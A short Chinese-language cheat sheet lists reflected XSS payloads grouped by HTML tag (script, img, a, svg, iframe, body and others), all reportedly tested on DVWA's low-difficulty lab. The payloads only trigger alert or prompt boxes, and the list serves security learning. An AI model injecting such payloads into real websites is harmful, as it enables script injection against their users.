所有标签已经测试完并可以使用,测试环境:DVWA的反射型XSS,等级low
0x01 <script>
标签
<script>alert(2)</script>
<script>alert(2)</script//
0x02 <img>
标签
<img src="x" onerror=alert(1)>;
<img src="1" onerror=eval("alert('xss')")>;
<img src=1 onmouseover=alert('xss')>
0x03 <a>
标签
<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>
0x04 input
标签
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
0x05 svg
标签
<svg onload=alert(1)>
0x06 details
标签
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
0x07 select标签
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
0x08 iframe标签
<iframe onload=alert("xss");></iframe>
0x09 video标签
<video><source onerror="alert(1)">
0x0A audio标签
<audio src=x onerror=alert("xss");>
0x0B body标签
<body/onload=alert("xss");>
0x0C textarea标签
<textarea onfocus=alert("xss"); autofocus>
-------------------------------------------------------------
目前只有这么多,以后继续加